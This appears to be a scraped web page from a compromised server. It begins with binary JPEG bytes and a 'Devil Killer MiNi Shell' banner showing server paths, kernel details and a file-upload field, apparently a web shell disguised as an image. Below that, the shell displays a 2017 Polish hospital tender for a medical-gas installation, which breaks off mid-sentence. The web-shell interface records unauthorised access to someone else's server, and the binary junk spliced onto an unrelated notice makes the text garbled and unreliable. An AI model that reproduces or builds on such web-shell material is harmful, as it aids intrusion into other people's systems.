JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170228/33817-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.szpital-orlowskiego.pl' target='_blank'>http://www.szpital-orlowskiego.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 33817 - 2017
              z dnia 2017-02-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Kontynuacja II etapu zadania: Wykonanie centralnej instalacji gazów medycznych (tlen, podtlenek azotu, sprężone powietrze, próżnia) z posadowieniem zbiornika ciekłego tlenu, wraz z wykonaniem wymaganej kompleksowej dokumentacji projektowej dla uzyskania pozwoleń na budowę <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Samodzielny Publiczny Szpital Kliniczny im. prof. W. Orłowskiego CMKP, krajowy numer identyfikacyjny
              29088300000, ul.
              ul. Czerniakowska 
              231,
              00416  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              225 841 110, e-mail
              zamowienia@szpital-orlowskiego.pl, faks
              225 841 109.
              <br />
              Adres strony internetowej (URL): www.szpital-orlowskiego.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.szpital-orlowskiego.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.szpital-orlowskiego.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca w nieprzejrzystym, zamkniętym opakowaniu w siedzibie Zamawiającego.   <br />
                Adres:
                <br />SPSK im. prof. W. Orłowskiego CMKP, ul. Czerniakowska231, 00-416 Warszawa - pokój D001 Dział Zamówień Publicznych i Zaopatrzenia.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Kontynuacja II etapu zadania: Wykonanie centralnej instalacji gazów medycznych (tlen, podtlenek azotu, sprężone powietrze, próżnia) z posadowieniem zbiornika ciekłego tlenu, wraz z wykonaniem wymaganej kompleksowej dokumentacji projektowej dla uzyskania pozwoleń na budowę <br /><b>Numer referencyjny: </b>19/8/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1)	Zadanie nr 1 - Branża budowlana: 

a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży budowlanej i robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót

2)	Zadanie nr 2  Branża sanitarna:

a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży sanitarnej w tym zabudów i robót poinstalacyjnych poniżej II piętra z wentylacją i klimatyzacją i jej elementami na dachu łącznika i poddaszu budynku D z wyłączeniem branży gazy medyczne, 
b)	Dostawa instalacja i uruchomienie urządzeń o parametrach określonych w dokumentacji projektowej
c)	robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót 


3)	Zadanie nr 3  Branża elektryczna:

a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży elektrycznej w tym zabudów i robót poinstalacyjnych poniżej II piętra 
b)	Dostawa instalacja i uruchomienie urządzeń o parametrach określonych w dokumentacji projektowej
c)	robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót

4)	Zadanie nr 4  Branża gazy medyczne wraz z elementami branży elektrycznej:

a)	Wszystkie roboty objęte opracowaniami projektowymi i przedmiarem w zakresie branży gazy medyczne
b)	Roboty elektryczne z przedmiaru robót gazów medycznych ujętych w dziale 2 przedmiaru;
c)	Dostawa instalacja i uruchomienie urządzeń określonych w załączniku nr 8 do SIWZ, oraz urządzeń nie ujętych w załączniku nr  8 do SIWZ, a ujętych w dokumentacji projektowej .
d)	robotami zobowiązaniowymi wynikającymi z treści umowy na wykonanie robót
<br /><br /><b>II.5) Główny kod CPV: </b>45210000-2<br /><b> Dodatkowe kody CPV:</b>44160000-9,
                45315400-2,
                45315600-4,
                45223200-8,
                45111300-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający  przewiduje udzielenie zamówień w oparciu o art. 67 ust. 1 pkt 6 ustawy Pzp oraz art. 67 ust. 1 pkt 7 ustawy Pzp,  stanowiących łącznie dla obu podstaw prawnych nie więcej niż 30% wartości zamówienia podstawowego.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 105<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Żródło finansowania - Dotacja z MZ + środki własne (10%)</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                
Dla zadania 1 - Branża budowlana

Wykonawca spełni warunek w sytuacji kiedy wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min  500.000,-PLN.

Dla zadania 2 - Branża sanitarna

Wykonawca spełni warunek w sytuacji kiedy wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min 1.000.000,- PLN.

Dla zadania 3 - Branża elektryczna

Wykonawca spełni warunek w sytuacji kiedy wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 200.000,- PLN.

Dla zadania 4 - Branża gazy medyczne wraz z elementami branży elektrycznej

Wykonawca spełni warunek w sytuacji kiedy wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min 1.000.000,- PLN.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Dla zadania nr 1 - Branża budowlana

1)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 2 roboty budowlane, przez którą zamawiający będzie rozumiał prace budowlane o wartości min 1.900.000,-PLN brutto każda,  polegających na wykonaniu prac remontowych budowlanych o charakterze m.in. rozbiórkowym, stawianiu ścianek z cegieł i zabudów z płyt gipsowo kartonowych,  sufitów podwieszanych, wykonywaniu robót murarsko tynkarskich, nakładaniu powłok gipsowych, układaniu glazury i terrakoty, układaniu wykładzin podłogowych z tworzyw sztucznych, wykonywaniu prac malarskich, montażu stolarki okiennej i drzwiowej przy czym jedna z tych robót realizowana była dla potrzeb służby zdrowia (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ), 
2)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że skieruje do realizacji zamówienia kierownika robót budowlanych  posiadającego co najmniej wykształcenie wyższe w specjalności budownictwo ogólne lub równorzędne dla uzyskania uprawnień budowlanych w ww. wymaganej specjalności i w wyniku ukończenia studiów wyższych uzyskał uprawnienia budowlane w specjalności konstrukcyjno budowlanej 
w zakresie kierowania i nadzorowania robót i posiada je co najmniej 5 lat 
i w tym czasie kierował co najmniej jeden raz wykonaniem robót ogólnobudowlanych o charakterze remontowym , oraz aktualnie przynależy do izby inżynierów budownictwa, (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)

Dla zadania nr 2 - Branża sanitarna

1)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 1 robotę budowlaną w specjalności sanitarnej, przez którą zamawiający będzie rozumiał prace w zakresie instalacji sanitarnych i wentylacyjno  klimatyzacyjnych o wartości min.  1.000.000,- PLN brutto, wykonaną w obiekcie służby zdrowia (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ), 

2)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że skieruje do realizacji zamówienia kierownika robót sanitarnych posiadającego co najmniej wykształcenie wyższe w specjalności sanitarnej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w specjalności wewnętrznych instalacji sanitarnych w tym instalacji wentylacyjno  klimatyzacyjnych i w wyniku ukończenia studiów wyższych uzyskał takie uprawnienia budowlane i posiada je co najmniej 5 lat i w tym czasie 
kierował co najmniej jeden raz wykonaniem robót sanitarnych, wentylacji i klimatyzacji w obiektach służby zdrowia, oraz aktualnie przynależy do izby inżynierów budownictwa. (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)


Dla zadania nr 3 - Branża elektryczna

1)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 1 robotę budowlaną w specjalności elektrycznej, przez którą zamawiający będzie rozumiał kompleksowo wykonane  prace  elektryczne wraz z robotami poinstalacyjnymi o wartości min.  1.000.000,- PLN brutto, wykonane w czynnym obiekcie służby zdrowia tj bez wyłączenia z funkcjonowania całego oddziału, a jedynie pojedynczych pomieszczeń na czas wykonania robót (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ), 

2)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że skieruje do realizacji zamówienia kierownika robót elektrycznych  posiadającego wykształcenie wyższe w specjalności elektrycznej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w wymaganej specjalności i w wyniku ukończenia studiów wyższych uzyskał takie uprawnienia budowlane w specjalności elektrycznej i posiada je co 
najmniej 5 lat i w tym czasie kierowała co najmniej jeden raz wykonywaniem robót elektrycznych w obiektach służby zdrowia, posiada aktualne uprawnienia dozorowe 
(grupa D)  i eksploatacyjne (grupa E) dla urządzeń energetycznych, oraz aktualnie przynależy do izby inżynierów budownictwa (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)
               
Dla zadania nr 4 - Branża gazy medyczne wraz z elementami branży elektrycznej

1)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 1 robotę budowlaną w specjalności gazy medyczne, przez którą zamawiający będzie rozumiał prace  instalacyjne dla gazów medycznych wraz z dostawą urządzeń  wyposażenia sal operacyjnych o wartości min. 1.400.000,-PLN brutto, wykonane w obiekcie służby zdrowia, które uzyskały certyfikat wyrobu medycznego (z wykorzystaniem wzoru  załącznik nr 9 do SIWZ), 

2)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że skieruje do realizacji zamówienia kierownika robót sanitarnych posiadającego co najmniej wykształcenie wyższe w specjalności sanitarnej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w specjalności wewnętrznych instalacji sanitarnych w tym instalacji gazowych i w wyniku ukończenia studiów wyższych uzyskał takie 
uprawnienia budowlane i posiada je co najmniej 5 lat i w tym czasie 
kierował co najmniej jeden raz wykonywaniem robót, instalacji gazów medycznych, w obiektach służby zdrowia i  instalacja ta uzyskała  status wyrobu medycznego, oraz aktualnie przynależy do izby inżynierów budownictwa. 
(z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)

3)	Wykonawca spełni warunek w sytuacji kiedy wykaże, że skieruje do realizacji zamówienia kierownika robót elektrycznych  posiadającego wykształcenie wyższe w specjalności elektrycznej lub równorzędne uprawniające do uzyskania uprawnień budowlanych w wymaganej specjalności i w wyniku ukończenia studiów wyższych uzyskał takie uprawnienia budowlane w specjalności elektrycznej i posiada je co 
najmniej 5 lat i w tym czasie kierowała co najmniej jeden raz wykonywaniem robót elektrycznych w czynnych obiektach służby zdrowia, posiada aktualne uprawnienia dozorowe (grupa D)  i eksploatacyjne (grupa E) dla urządzeń energetycznych, oraz aktualnie przynależy do izby inżynierów budownictwa (z wykorzystaniem wzoru  załącznik nr 10 do SIWZ)
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
2.Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3.Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4.Oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumenty potwierdzające dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności.  załącznik nr 11 do SIWZ
5.Oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716)  załącznik nr 12 do SIWZ.
6.Dla potwierdzenia warunku określonego w ust. 6.11 pkt 2 SIWZ wykonawca składa wraz z ofertą oświadczenie, o którym jest mowa w ust. 7.1 pkt 1 SIWZ</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Dla zadania nr 1 - Branża budowlana 
Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty, tj. wykonał co najmniej 2 roboty budowlane, przez którą zamawiający będzie rozumiał prace budowlane o wartości min. 1.900.000-PLN brutto każda,  polegających na wykonaniu prac remontowych budowlanych o charakterze m.in. rozbiórkowym, stawianiu ścianek z cegieł i zabudów z płyt gipsowo kartonowych,  sufitów podwieszanych, wykonywaniu robót murarsko tynkarskich, nakładaniu powłok gipsowych, układaniu glazury i terrakoty, układaniu 